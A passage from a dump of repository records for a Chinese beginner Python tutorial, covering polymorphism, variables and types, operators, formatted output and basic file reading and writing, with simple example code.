如果在当前类中 **找到方法,就直接执行,不再搜索**\n- 如果 **没有找到,就查找下一个类** 中是否有对应的方法,**如果找到,就直接执行,不再搜索**\n- 如果找到最后一个类,还没有找到方法,程序报错\n\n## 多态\n\n重温一下面向对象三大特性:\n\n1. **封装** 根据 **职责** 将 **属性** 和 **方法** **封装** 到一个抽象的 **类** 中\n - 定义类的准则\n2. **继承** **实现代码的重用**,相同的代码不需要重复的编写\n - 设计类的技巧\n - 子类针对自己特有的需求,编写特定的代码\n3. **多态** 不同的 **子类对象** 调用相同的 **父类方法**,产生不同的执行结果\n - **多态** 可以 **增加代码的灵活度**\n - 以 **继承** 和 **重写父类方法** 为前提\n - 是调用方法的技巧,**不会影响到类的内部设计**\n\n\n\n## 多态案例演练\n\n1.在 `Dog` 类中封装方法 `game`\n\n- 普通狗只是简单的玩耍\n\n2.定义 `XiaoTianDog` 继承自 `Dog`,并且重写 `game` 方法\n\n- 哮天犬需要在天上玩耍\n\n3.定义 `Person` 类,并且封装一个 **和狗玩** 的方法\n\n+ 在方法内部,直接让 **狗对象** 调用 `game` 方法\n\n\n\n**案例小结**\n\n- `Person` 类中只需要让 **狗对象** 调用 `game` 方法,而不关心具体是 **什么狗**\n - `game` 方法是在 `Dog` 父类中定义的\n- 在程序执行时,传入不同的 **狗对象** 实参,就会产生不同的执行效果\n\n> **多态** 更容易编写出出通用的代码,做出通用的编程,以适应需求的不断变化!\n\n```\nclass Dog(object):\n\n def __init__(self, name):\n self.name = name\n\n def game(self):\n print(\"%s 蹦蹦跳跳的玩耍...\" % self.name)\n\n\nclass XiaoTianDog(Dog):\n\n def game(self):\n print(\"%s 飞到天上去玩耍...\" % self.name)\n\n\nclass Person(object):\n\n def __init__(self, name):\n self.name = name\n\n def game_with_dog(self, dog):\n\n print(\"%s 和 %s 快乐的玩耍...\" % (self.name, dog.name))\n\n # 让狗玩耍\n dog.game()\n\n\n# 1. 创建一个狗对象\n# wangcai = Dog(\"旺财\")\nwangcai = XiaoTianDog(\"飞天旺财\")\n\n# 2. 创建一个小明对象\nxiaoming = Person(\"小明\")\n\n# 3. 让小明调用和狗玩的方法\nxiaoming.game_with_dog(wangcai)\n```\n\n\n"
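前文"对父类方法进行扩展"一节只有文字描述,没有配套代码;下面补一个最小示例演示 `super().父类方法` 的用法(类名与输出内容为示意,并非原文给出的案例):

```python
class Animal:

    def eat(self):
        print("吃东西")


class Dog(Animal):

    def eat(self):
        # 1. 针对子类特有的需求,编写特有代码
        print("狗狗围着碗转圈")
        # 2. 使用 super().父类方法 调用在父类中封装的方法实现
        super().eat()
        # 3. 在需要的位置继续编写子类特有的扩展代码
        print("吃完舔舔嘴")


wangcai = Dog()
wangcai.eat()
```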
},
{
"alpha_fraction": 0.4980723559856415,
"alphanum_fraction": 0.5270611047744751,
"avg_line_length": 19.31174659729004,
"blob_id": "e9d4f87a89b9f3b3f7a4f62295815cb52fc649d4",
"content_id": "6f06c8786b015c011903bd85f57b114fd5257553",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 23608,
"license_type": "permissive",
"max_line_length": 876,
"num_lines": 664,
"path": "/Python基础连载/Python语言相关.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:Python语言相关\n\n# Python语言相关\n\n- 程序和进制\n- 变量 - 变量的命名 / 变量的使用 / input函数 / 检查变量类型 / 类型转换\n- 数字和字符串 - 整数 / 浮点数 / 复数 / 字符串 / 字符串基本操作 / 字符编码\n- 运算符 - 数学运算符 / 赋值运算符 / 比较运算符 / 逻辑运算符 / 身份运算符 / 运算符的优先级\n\n### 程序和进制\n\n计算机的硬件系统通常由五大部件构成,包括:运算器、控制器、存储器、输入设备和输出设备。其中,运算器和控制器放在一起就是我们通常所说的中央处理器,它的功能是执行各种运算和控制指令以及处理计算机软件中的数据。我们通常所说的程序实际上就是指令的集合,我们程序就是将一系列的指令按照某种方式组织到一起,然后通过这些指令去控制计算机做我们想让它做的事情。今天我们大多数时候使用的计算机,虽然它们的元器件做工越来越精密,处理能力越来越强大,但究其本质来说仍然属于[“冯·诺依曼结构”](https://zh.wikipedia.org/wiki/冯·诺伊曼结构)的计算机。“冯·诺依曼结构”有两个关键点,一是指出要将存储设备与中央处理器分开,二是提出了将数据以二进制方式编码。二进制是一种“逢二进一”的计数法,跟我们人类使用的“逢十进一”的计数法没有实质性的区别,人类因为有十根手指所以使用了十进制(因为在数数时十根手指用完之后就只能进位了,当然凡事都有例外,玛雅人可能是因为长年光着脚的原因把脚趾头也算上了,于是他们使用了二十进制的计数法,在这种计数法的指导下玛雅人的历法就与我们平常使用的历法不一样,而按照玛雅人的历法,2012年是上一个所谓的“太阳纪”的最后一年,而2013年则是新的“太阳纪”的开始,后来这件事情被以讹传讹的方式误传为”2012年是玛雅人预言的世界末日“这种荒诞的说法,今天我们可以大胆的猜测,玛雅文明之所以发展缓慢估计也与使用了二十进制有关)。对于计算机来说,二进制在物理器件上来说是最容易实现的(高电压表示1,低电压表示0),于是在“冯·诺依曼结构”的计算机都使用了二进制。虽然我们并不需要每个程序员都能够使用二进制的思维方式来工作,但是了解二进制以及它与我们生活中的十进制之间的转换关系,以及二进制与八进制和十六进制的转换关系还是有必要的。如果你对这一点不熟悉,可以自行使用[维基百科](https://zh.wikipedia.org/wiki/二进制)或者[百度百科](https://baike.baidu.com/)科普一下。\n\n### 变量与类型\n\n在程序设计中,变量是一种存储数据的载体。计算机中的变量是实际存在的数据或者说是存储器中存储数据的一块内存空间,变量的值可以被读取和修改,这是所有计算和控制的基础。计算机能处理的数据有很多种类型,除了数值之外还可以处理文本、图形、音频、视频等各种各样的数据,那么不同的数据就需要定义不同的存储类型。\n\n> **程序就是用来处理数据的,而变量就是用来存储数据的**\n\n## 变量定义\n\n- 在 Python 中,每个变量 **在使用前都必须赋值**,变量 **赋值以后** 该变量 **才会被创建**\n- 等号(=)用来给变量赋值\n - `=` 左边是一个变量名\n - `=` 右边是存储在变量中的值\n\n```\n变量名 = 值\n```\n\n> 变量定义之后,后续就可以直接使用了\n\n### 1) 变量演练1-- IDLE —— Python\n\n```\n# 定义 qq_number 的变量用来保存 qq 号码\nIn [1]: qq_number = \"1234567\"\n\n# 输出 qq_number 中保存的内容\nIn [2]: qq_number\nOut[2]: '1234567'\n\n# 定义 qq_password 的变量用来保存 qq 密码\nIn [3]: qq_password = \"123\"\n\n# 输出 qq_password 中保存的内容\nIn [4]: qq_password\nOut[4]: '123'\n```\n\n> 使用交互式方式,如果要查看变量内容,直接输入变量名即可,不需要使用 `print` 函数\n\n### 2) 变量演练 2 —— PyCharm\n\n```\n# 定义 qq 号码变量\nqq_number = \"1234567\"\n\n# 定义 qq 密码变量\nqq_password = \"123\"\n\n# 在程序中,如果要输出变量的内容,需要使用 print 函数\nprint(qq_number)\nprint(qq_password)\n```\n\n> 使用解释器执行,如果要输出变量的内容,必须要要使用 `print` 函数\n\n### 3) 变量演练 3 —— 超市买苹果\n\n> - 可以用 **其他变量的计算结果** 来定义变量\n> - 变量定义之后,后续就可以直接使用了\n\n**需求**\n\n- 苹果的价格是 **8.5 元/斤**\n- 买了 **7.5 斤** 苹果\n- 计算付款金额\n\n```\n# 定义苹果价格变量\nprice = 8.5\n\n# 定义购买重量\nweight = 7.5\n\n# 计算金额\nmoney = price * weight\n\nprint(money)\n```\n\n#### 思考题\n\n- 如果 **只要买苹果,就返 5 块钱**\n- 请重新计算购买金额\n\n```\n# 定义苹果价格变量\nprice = 8.5\n\n# 定义购买重量\nweight = 7.5\n\n# 计算金额\nmoney = price * weight\n\n# 只要买苹果就返 5 元\nmoney = money - 5\nprint(money)\n```\n\n**提问**\n\n- 上述代码中,一共定义有几个变量?\n\n - 三个:`price`/`weight`/`money`\n\n- ```\n money = money - 5\n ```\n\n \n\n 是在定义新的变量还是在使用变量?\n\n - 直接使用之前已经定义的变量\n - 变量名 只有在 **第一次出现** 才是 **定义变量**\n - 变量名 再次出现,不是定义变量,而是直接使用之前定义过的变量\n\n- 在程序开发中,可以修改之前定义变量中保存的值吗?\n\n - 可以\n - 变量中存储的值,就是可以 **变** 的\n\n## 02. 变量的类型\n\n- 在内存中创建一个变量,会包括:\n 1. 变量的名称\n 2. 变量保存的数据\n 3. 变量存储数据的类型\n 4. 变量的地址(标示)\n\n### 2.1 变量类型的演练 —— 个人信息\n\n**需求**\n\n- 定义变量保存小明的个人信息\n- 姓名:**小明**\n- 年龄:**18** 岁\n- 性别:**是**男生\n- 身高:**1.75** 米\n- 体重:**75.0** 公斤\n\n> 利用 **单步调试** 确认变量中保存数据的类型\n\n**提问**\n\n1. 在演练中,一共有几种数据类型?\n\n - 4 种\n - `str` —— 字符串\n - `bool` —— 布尔(真假)\n - `int` —— 整数\n - `float` —— 浮点数(小数)\n\n2. 
在\n\n \n\n ```\n Python\n ```\n\n \n\n 中定义变量时需要指定类型吗?\n\n - 不需要\n - `Python` 可以根据 `=` 等号右侧的值,自动推导出变量中存储数据的类型\n\n### 2.2 变量的类型\n\n- 在 `Python` 中定义变量是 **不需要指定类型**(在其他很多高级语言中都需要)\n\n- 数据类型可以分为 **数字型** 和 **非数字型**\n\n- 数字型\n\n - 整型 (`int`)\n\n - 浮点型(`float`)\n\n - 布尔型(\n\n ```\n bool\n ```\n\n )\n\n - 真 `True` `非 0 数` —— **非零即真**\n - 假 `False` `0`\n\n - 复数型 (\n\n ```\n complex\n ```\n\n )\n\n - 主要用于科学计算,例如:平面场问题、波动问题、电感电容等问题\n\n- 非数字型\n\n - 字符串\n - 列表\n - 元组\n - 字典\n\n> 提示:在 Python 2.x 中,**整数** 根据保存数值的长度还分为:\n>\n> - `int`(整数)\n> - `long`(长整数)\n\n- 使用 `type` 函数可以查看一个变量的类型\n\n```\nIn [1]: type(name)\n```\n\n### 2.3 不同类型变量之间的计算\n\n#### 1) **数字型变量** 之间可以直接计算\n\n- 在 Python 中,两个数字型变量是可以直接进行 算数运算的\n\n- 如果变量是\n\n \n\n ```\n bool\n ```\n\n \n\n 型,在计算时\n\n - `True` 对应的数字是 `1`\n - `False` 对应的数字是 `0`\n\n**演练步骤**\n\n1. 定义整数 `i = 10`\n2. 定义浮点数 `f = 10.5`\n3. 定义布尔型 `b = True`\n\n- 在 iPython 中,使用上述三个变量相互进行算术运算\n\n#### 2) **字符串变量** 之间使用 `+` 拼接字符串\n\n- 在 Python 中,字符串之间可以使用 `+` 拼接生成新的字符串\n\n```\nIn [1]: first_name = \"三\"\n\nIn [2]: last_name = \"张\"\n\nIn [3]: first_name + last_name\nOut[3]: '三张'\n```\n\n#### 3) **字符串变量** 可以和 **整数** 使用 `*` 重复拼接相同的字符串\n\n```\nIn [1]: \"-\" * 50\nOut[1]: '--------------------------------------------------'\n```\n\n#### 4) **数字型变量** 和 **字符串** 之间 **不能进行其他计算**\n\n```\nIn [1]: first_name = \"zhang\"\n\nIn [2]: x = 10\n\nIn [3]: x + first_name\n---------------------------------------------------------------------------\nTypeError: unsupported operand type(s) for +: 'int' and 'str'\n类型错误:`+` 不支持的操作类型:`int` 和 `str`\n```\n\n### 2.4 变量的输入\n\n- 所谓 **输入**,就是 **用代码** **获取** 用户通过 **键盘** 输入的信息\n- 例如:去银行取钱,在 ATM 上输入密码\n- 在 Python 中,如果要获取用户在 **键盘** 上的输入信息,需要使用到 `input` 函数\n\n#### 1) 关于函数\n\n- 一个 **提前准备好的功能**(别人或者自己写的代码),**可以直接使用**,而 **不用关心内部的细节**\n- 目前已经学习过的函数\n\n| 函数 | 说明 |\n| -------- | ----------------- |\n| print(x) | 将 x 输出到控制台 |\n| type(x) | 查看 x 的变量类型 |\n\n#### 2) input 函数实现键盘输入\n\n- 在 Python 中可以使用 `input` 函数从键盘等待用户的输入\n- 用户输入的 **任何内容** Python 都认为是一个 **字符串**\n- 语法如下:\n\n```\n字符串变量 = input(\"提示信息:\")\n```\n\n#### 3) 类型转换函数\n\n| 函数 | 说明 |\n| -------- | --------------------- |\n| int(x) | 将 x 转换为一个整数 |\n| float(x) | 将 x 转换到一个浮点数 |\n\n#### 4) 变量输入演练 —— 超市买苹果增强版\n\n**需求**\n\n- **收银员输入** 苹果的价格,单位:**元/斤**\n- **收银员输入** 用户购买苹果的重量,单位:**斤**\n- 计算并且 **输出** 付款金额\n\n##### 演练方式 1\n\n```\n# 1. 输入苹果单价\nprice_str = input(\"请输入苹果价格:\")\n\n# 2. 要求苹果重量\nweight_str = input(\"请输入苹果重量:\")\n\n# 3. 计算金额\n# 1> 将苹果单价转换成小数\nprice = float(price_str)\n\n# 2> 将苹果重量转换成小数\nweight = float(weight_str)\n\n# 3> 计算付款金额\nmoney = price * weight\n\nprint(money)\n```\n\n**提问**\n\n1. 演练中,针对价格 \n\n 定义了几个变量?\n\n - **两个**\n - `price_str` 记录用户输入的价格字符串\n - `price` 记录转换后的价格数值\n\n2. **思考** —— 如果开发中,需要用户通过控制台 输入 **很多个 数字**,针对每一个数字都要定义两个变量,**方便吗**?\n\n##### 演练方式 2 —— 买苹果改进版\n\n1. **定义** 一个 **浮点变量** 接收用户输入的同时,就使用 `float` 函数进行转换\n\n```\nprice = float(input(\"请输入价格:\"))\n```\n\n- 改进后的好处:\n\n1. 节约空间,只需要为一个变量分配空间\n2. 起名字方便,不需要为中间变量起名字\n\n- 改进后的“缺点”:\n\n1. 
初学者需要知道,两个函数能够嵌套使用,稍微有一些难度\n\n**提示**\n\n- 如果输入的不是一个数字,程序执行时会出错,有关数据转换的高级话题,后续会讲!\n\n### 2.5 变量的格式化输出\n\n> 苹果单价 `9.00` 元/斤,购买了 `5.00` 斤,需要支付 `45.00` 元\n\n- 在 Python 中可以使用 `print` 函数将信息输出到控制台\n\n- 如果希望输出文字信息的同时,**一起输出** **数据**,就需要使用到 **格式化操作符**\n\n- ```\n %\n ```\n\n 被称为格式化操作符,专门用于处理字符串中的格式\n\n - 包含 `%` 的字符串,被称为 **格式化字符串**\n - `%` 和不同的 **字符** 连用,**不同类型的数据** 需要使用 **不同的格式化字符**\n\n| 格式化字符 | 含义 |\n| ---------- | ------------------------------------------------------------ |\n| %s | 字符串 |\n| %d | 有符号十进制整数,`%06d` 表示输出的整数显示位数,不足的地方使用 `0` 补全 |\n| %f | 浮点数,`%.2f` 表示小数点后只显示两位 |\n| %% | 输出 `%` |\n\n- 语法格式如下:\n\n```\nprint(\"格式化字符串\" % 变量1)\n\nprint(\"格式化字符串\" % (变量1, 变量2...))\n```\n\n**我们在这里将之前学到的东西再综合实战一下**\n\n下面通过几个例子来说明变量的类型和变量使用。\n\n```\n\"\"\"\n使用变量保存数据并进行加减乘除运算\n\nAuthor: 海森堡\n\"\"\"\na = 321\nb = 12\nprint(a + b) # 333\nprint(a - b) # 309\nprint(a * b) # 3852\nprint(a / b) # 26.75\n```\n\n在Python中可以使用`type`函数对变量的类型进行检查。程序设计中函数的概念跟数学上函数的概念是一致的,数学上的函数相信大家并不陌生,它包括了函数名、自变量和因变量。如果暂时不理解这个概念也不要紧,我们会在后续的章节中专门讲解函数的定义和使用。\n\n```\n\"\"\"\n使用type()检查变量的类型\n\nAuthor: 海森堡\n\"\"\"\na = 100\nb = 12.345\nc = 1 + 5j\nd = 'hello, world'\ne = True\nprint(type(a)) # <class 'int'>\nprint(type(b)) # <class 'float'>\nprint(type(c)) # <class 'complex'>\nprint(type(d)) # <class 'str'>\nprint(type(e)) # <class 'bool'>\n```\n\n可以使用Python中内置的函数对变量类型进行转换。\n\n- `int()`:将一个数值或字符串转换成整数,可以指定进制。\n- `float()`:将一个字符串转换成浮点数。\n- `str()`:将指定的对象转换成字符串形式,可以指定编码。\n- `chr()`:将整数转换成该编码对应的字符串(一个字符)。\n- `ord()`:将字符串(一个字符)转换成对应的编码(整数)。\n\n下面的代码通过键盘输入两个整数来实现对两个整数的算术运算。\n\n```\n\"\"\"\n使用input()函数获取键盘输入(字符串)\n使用int()函数将输入的字符串转换成整数\n使用print()函数输出带占位符的字符串\n\nAuthor: 海森堡\n\"\"\"\na = int(input('a = '))\nb = int(input('b = '))\nprint('%d + %d = %d' % (a, b, a + b))\nprint('%d - %d = %d' % (a, b, a - b))\nprint('%d * %d = %d' % (a, b, a * b))\nprint('%d / %d = %f' % (a, b, a / b))\nprint('%d // %d = %d' % (a, b, a // b))\nprint('%d %% %d = %d' % (a, b, a % b))\nprint('%d ** %d = %d' % (a, b, a ** b))\n```\n\n> **说明**:上面的print函数中输出的字符串使用了占位符语法,其中`%d`是整数的占位符,`%f`是小数的占位符,`%%`表示百分号(因为百分号代表了占位符,所以带占位符的字符串中要表示百分号必须写成`%%`),字符串之后的`%`后面跟的变量值会替换掉占位符然后输出到终端中,运行上面的程序,看看程序执行结果就明白啦。\n\n> 变量的命名规则\n\n> **命名规则** 可以被视为一种 **惯例**,并无绝对与强制 目的是为了 **增加代码的识别和可读性**\n\n#### 标识符和关键字\n\n> 标示符就是程序员定义的 **变量名**、**函数名**\n\n- 标示符可以由 **字母**、**下划线** 和 **数字** 组成\n- **不能以数字开头**\n- **不能与关键字重名**\n\n### 关键字\n\n- **关键字** 就是在 `Python` 内部已经使用的标识符\n- **关键字** 具有特殊的功能和含义\n- 开发者 **不允许定义和关键字相同的名字的标示符**\n\n## 变量的命名规则\n\n> **命名规则** 可以被视为一种 **惯例**,并无绝对与强制 目的是为了 **增加代码的识别和可读性**\n\n**注意** `Python` 中的 **标识符** 是 **区分大小写的**\n\n[](https://github.com/hyh1750522171/bigData/blob/master/He Yihao/python基础/images/009/002_标识符区分大小写.jpg)\n\n1. 在定义变量时,为了保证代码格式,`=` 的左右应该各保留一个空格\n\n2. Python中,如果变量名需要由 二个 或 多个单词 组成时,可以按照以下方式命名\n\n 1. 每个单词都使用小写字母\n 2. 
单词与单词之间使用 **`_`下划线** 连接\n\n - 例如:`first_name`、`last_name`、`qq_number`、`qq_password`\n\n### 驼峰命名法\n\n- 当 **变量名** 是由二个或多个单词组成时,还可以利用驼峰命名法来命名\n- 小驼峰式命名法\n - 第一个单词以小写字母开始,后续单词的首字母大写\n - 例如:`firstName`、`lastName`\n- 大驼峰式命名法\n - 每一个单词的首字母都采用大写字母\n - 例如:`FirstName`、`LastName`、`CamelCase`\n\n在Python中使用变量时,需要遵守一些规则和指南。违反这些规则将引发错误,而指南旨在让你编写的代码更容易阅读和理解。请务必牢记下述有关变量的规则。 \n\n+ 变量名只能包含字母、数字和下划线。变量名可以字母或下划线打头,但不能以数字打头,例如,可将变量命名为message_1,但不能将其命名为1_message。 \n\n+ 变量名不能包含空格,但可使用下划线来分隔其中的单词。例如,变量名greeting_message可行,但变量名greetingmessage会引发错误。 \n\n+ 不要将Python关键字和函数名用作变量名,即不要使用Python保留用于特殊用途的单词,如print (请参见附录A.4)。 \n\n+ 变量名应既简短又具有描述性。例如,name比n好,student_name比s_n好,name_length比length_of_persons_name好。 \n\n+ 慎用小写字母l和大写字母O,因为它们可能被人错看成数字1和0。 \n\n要创建良好的变量名,需要经过一定的实践,在程序复杂而有趣时尤其如此。随着你编写的程序越来越多,并开始阅读别人编写的代码,将越来越善于创建有意义的变量名。\n\n### 运算符\n\nPython支持多种运算符,下表大致按照优先级从高到低的顺序列出了所有的运算符,运算符的优先级指的是多个运算符同时出现时,先做什么运算然后再做什么运算。除了我们之前已经用过的赋值运算符和算术运算符,我们稍后会陆续讲到其他运算符的使用。\n\n- 算数运算符\n- 比较(关系)运算符\n- 逻辑运算符\n- 赋值运算符\n- 运算符的优先级\n\n## 算数运算符\n\n- 是完成基本的算术运算使用的符号,用来处理四则运算\n\n| 运算符 | 描述 | 实例 |\n| ------ | ------ | ------------------------------------------ |\n| + | 加 | 10 + 20 = 30 |\n| - | 减 | 10 - 20 = -10 |\n| * | 乘 | 10 * 20 = 200 |\n| / | 除 | 10 / 20 = 0.5 |\n| // | 取整除 | 返回除法的整数部分(商) 9 // 2 输出结果 4 |\n| % | 取余数 | 返回除法的余数 9 % 2 = 1 |\n| ** | 幂 | 又称次方、乘方,2 ** 3 = 8 |\n\n- 在 Python 中 `*` 运算符还可以用于字符串,计算结果就是字符串重复指定次数的结果\n\n```\nIn [1]: \"-\" * 50\nOut[1]: '----------------------------------------' \n```\n\n## 比较(关系)运算符\n\n| 运算符 | 描述 |\n| ------ | ------------------------------------------------------------ |\n| == | 检查两个操作数的值是否 **相等**,如果是,则条件成立,返回 True |\n| != | 检查两个操作数的值是否 **不相等**,如果是,则条件成立,返回 True |\n| > | 检查左操作数的值是否 **大于** 右操作数的值,如果是,则条件成立,返回 True |\n| < | 检查左操作数的值是否 **小于** 右操作数的值,如果是,则条件成立,返回 True |\n| >= | 检查左操作数的值是否 **大于或等于** 右操作数的值,如果是,则条件成立,返回 True |\n| <= | 检查左操作数的值是否 **小于或等于** 右操作数的值,如果是,则条件成立,返回 True |\n\n> Python 2.x 中判断 **不等于** 还可以使用 `<>` 运算符\n>\n> `!=` 在 Python 2.x 中同样可以用来判断 **不等于**\n\n## 逻辑运算符\n\n| 运算符 | 逻辑表达式 | 描述 |\n| ------ | ---------- | ------------------------------------------------------------ |\n| and | x and y | 只有 x 和 y 的值都为 True,才会返回 True 否则只要 x 或者 y 有一个值为 False,就返回 False |\n| or | x or y | 只要 x 或者 y 有一个值为 True,就返回 True 只有 x 和 y 的值都为 False,才会返回 False |\n| not | not x | 如果 x 为 True,返回 False 如果 x 为 False,返回 True |\n\n## 赋值运算符\n\n- 在 Python 中,使用 `=` 可以给变量赋值\n- 在算术运算时,为了简化代码的编写,`Python` 还提供了一系列的 与 **算术运算符** 对应的 **赋值运算符**\n- 注意:**赋值运算符中间不能使用空格**\n\n| 运算符 | 描述 | 实例 |\n| ------ | -------------------------- | ------------------------------------- |\n| = | 简单的赋值运算符 | c = a + b 将 a + b 的运算结果赋值为 c |\n| += | 加法赋值运算符 | c += a 等效于 c = c + a |\n| -= | 减法赋值运算符 | c -= a 等效于 c = c - a |\n| *= | 乘法赋值运算符 | c *= a 等效于 c = c * a |\n| /= | 除法赋值运算符 | c /= a 等效于 c = c / a |\n| //= | 取整除赋值运算符 | c //= a 等效于 c = c // a |\n| %= | 取 **模** (余数)赋值运算符 | c %= a 等效于 c = c % a |\n| **= | 幂赋值运算符 | c **= a 等效于 c = c ** a |\n\n## 运算符的优先级\n\n- 以下表格的算数优先级由高到最低顺序排列\n\n| 运算符 | 描述 |\n| ------------------------ | ---------------------- |\n| ** | 幂 (最高优先级) |\n| * / % // | 乘、除、取余数、取整除 |\n| + - | 加法、减法 |\n| <= < > >= | 比较运算符 |\n| == != | 等于运算符 |\n| = %= /= //= -= += *= **= | 赋值运算符 |\n| not or and | 逻辑运算符 |\n\n\n\n### 实战\n\n\n\n```python\n\"\"\"\n比较运算符和逻辑运算符的使用\n\nAuthor: 海森堡\n\"\"\"\nflag0 = 1 == 1\nflag1 = 10 > 2\nflag2 = 20 < 1\nflag3 = flag1 and flag2\nflag4 = flag1 or flag2\nflag5 = not (1 != 2)\nprint('flag0 =', flag0) # flag0 = True\nprint('flag1 =', flag1) # flag1 = True\nprint('flag2 =', flag2) # flag2 = False\nprint('flag3 =', flag3) # flag3 = 
False\nprint('flag4 =', flag4) # flag4 = True\nprint('flag5 =', flag5) # flag5 = False\n```\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.699999988079071,
"alphanum_fraction": 0.824999988079071,
"avg_line_length": 77,
"blob_id": "9bcdb1f4dd552999b304e7202adfcb6fa032ed65",
"content_id": "ddbccef9cd4cd2122a30bd3fdcd2f30ab1cdbe27",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 106,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 1,
"path": "/python100题/获取python100题pdf.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "获取Python100题pdf资源:链接:https://pan.baidu.com/s/1VDNMxqxzPpMx4Y6BaaQ2vw 提取码:765y \n\n"
},
{
"alpha_fraction": 0.5614814758300781,
"alphanum_fraction": 0.588821530342102,
"avg_line_length": 15.760722160339355,
"blob_id": "d0cf8db4e2e7108c833ac8da9455c4f7d5713ec0",
"content_id": "0dfaa596f9e10551921bf5218c9a235c9716a434",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13001,
"license_type": "permissive",
"max_line_length": 299,
"num_lines": 443,
"path": "/Python基础连载/文件和异常.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:文件和异常\n\n## 文件的概念\n\n### 文件的概念和作用\n\n- 计算机的 **文件**,就是存储在某种 **长期储存设备** 上的一段 **数据**\n- 长期存储设备包括:硬盘、U 盘、移动硬盘、光盘...\n\n**文件的作用**\n\n将数据长期保存下来,在需要的时候使用\n\n### 文件的存储方式\n\n- 在计算机中,文件是以 **二进制** 的方式保存在磁盘上的\n\n#### 文本文件和二进制文件\n\n- 文本文件\n - 可以使用 **文本编辑软件** 查看\n - 本质上还是二进制文件\n - 例如:python 的源程序\n- 二进制文件\n - 保存的内容 不是给人直接阅读的,而是 **提供给其他软件使用的**\n - 例如:图片文件、音频文件、视频文件等等\n - 二进制文件不能使用 **文本编辑软件** 查看\n\n## 文件的基本操作\n\n### 2.1 操作文件的套路\n\n在 **计算机** 中要操作文件的套路非常固定,一共包含**三个步骤**:\n\n1. 打开文件\n2. 读、写文件\n - **读** 将文件内容读入内存\n - **写** 将内存内容写入文件\n3. 关闭文件\n\n### 2.2 操作文件的函数/方法\n\n- 在 `Python` 中要操作文件需要记住 1 个函数和 3 个方法\n\n| 序号 | 函数/方法 | 说明 |\n| ---- | --------- | ------------------------------ |\n| 01 | open | 打开文件,并且返回文件操作对象 |\n| 02 | read | 将文件内容读取到内存 |\n| 03 | write | 将指定内容写入文件 |\n| 04 | close | 关闭文件 |\n\n- `open` 函数负责打开文件,并且返回文件对象\n- `read`/`write`/`close` 三个方法都需要通过 **文件对象** 来调用\n\n### 2.3 read 方法 —— 读取文件\n\n- open函数的第一个参数是要打开的文件名(文件名区分大小写)\n - 如果文件 **存在**,返回 **文件操作对象**\n - 如果文件 **不存在**,会 **抛出异常**\n- `read` 方法可以一次性 **读入** 并 **返回** 文件的 **所有内容**\n- close方法负责关闭文件\n - 如果 **忘记关闭文件**,**会造成系统资源消耗,而且会影响到后续对文件的访问**\n- **注意**:`read` 方法执行后,会把 **文件指针** 移动到 **文件的末尾**\n\n```\n# 1. 打开 - 文件名需要注意大小写\nfile = open(\"README\")\n\n# 2. 读取\ntext = file.read()\nprint(text)\n\n# 3. 关闭\nfile.close()\n```\n\n**提示**\n\n- 在开发中,通常会先编写 **打开** 和 **关闭** 的代码,再编写中间针对文件的 **读/写** 操作!\n\n#### 文件指针(知道)\n\n- **文件指针** 标记 **从哪个位置开始读取数据**\n- **第一次打开** 文件时,通常 **文件指针会指向文件的开始位置**\n- 当执行了read方法后,文件指针会移动到读取内容的末尾\n - 默认情况下会移动到 **文件末尾**\n\n**思考**\n\n- 如果执行了一次 `read` 方法,读取了所有内容,那么再次调用 `read` 方法,还能够获得到内容吗?\n\n**答案**\n\n- 不能\n- 第一次读取之后,文件指针移动到了文件末尾,再次调用不会读取到任何的内容\n\n### 打开文件的方式\n\n- `open` 函数默认以 **只读方式** 打开文件,并且返回文件对象\n\n语法如下:\n\n```\nf = open(\"文件名\", \"访问方式\")\n```\n\n| 访问方式 | 说明 |\n| -------- | ------------------------------------------------------------ |\n| r | 以**只读**方式打开文件。文件的指针将会放在文件的开头,这是**默认模式**。如果文件不存在,抛出异常 |\n| w | 以**只写**方式打开文件。如果文件存在会被覆盖。如果文件不存在,创建新文件 |\n| a | 以**追加**方式打开文件。如果该文件已存在,文件指针将会放在文件的结尾。如果文件不存在,创建新文件进行写入 |\n| r+ | 以**读写**方式打开文件。文件的指针将会放在文件的开头。如果文件不存在,抛出异常 |\n| w+ | 以**读写**方式打开文件。如果文件存在会被覆盖。如果文件不存在,创建新文件 |\n| a+ | 以**读写**方式打开文件。如果该文件已存在,文件指针将会放在文件的结尾。如果文件不存在,创建新文件进行写入 |\n\n**提示**\n\n- 频繁的移动文件指针,**会影响文件的读写效率**,开发中更多的时候会以 **只读**、**只写** 的方式来操作文件\n\n**写入文件示例**\n\n```\n# 打开文件\nf = open(\"README\", \"w\")\n\nf.write(\"hello python!\\n\")\nf.write(\"今天天气真好\")\n\n# 关闭文件\nf.close()\n```\n\n### 按行读取文件内容\n\n- `read` 方法默认会把文件的 **所有内容** **一次性读取到内存**\n- 如果文件太大,对内存的占用会非常严重\n\n#### `readline` 方法\n\n- `readline` 方法可以一次读取一行内容\n- 方法执行后,会把 **文件指针** 移动到下一行,准备再次读取\n\n**读取大文件的正确姿势**\n\n```\n# 打开文件\nfile = open(\"README\")\n\nwhile True:\n # 读取一行内容\n text = file.readline()\n\n # 判断是否读到内容\n if not text:\n break\n\n # 每读取一行的末尾已经有了一个 `\\n`\n print(text, end=\"\")\n\n# 关闭文件\nfile.close()\n```\n\n### 2.6 文件读写案例 —— 复制文件\n\n**目标**\n\n用代码的方式,来实现文件复制过程\n\n[](https://github.com/hyh1750522171/bigData/blob/master/He Yihao/python面向对象/media/15019810951755/025_复制文件.png)\n\n#### 小文件复制\n\n- 打开一个已有文件,读取完整内容,并写入到另外一个文件\n\n```\n# 1. 打开文件\nfile_read = open(\"README\")\nfile_write = open(\"README[复件]\", \"w\")\n\n# 2. 读取并写入文件\ntext = file_read.read()\nfile_write.write(text)\n\n# 3. 关闭文件\nfile_read.close()\nfile_write.close()\n```\n\n#### 大文件复制\n\n- 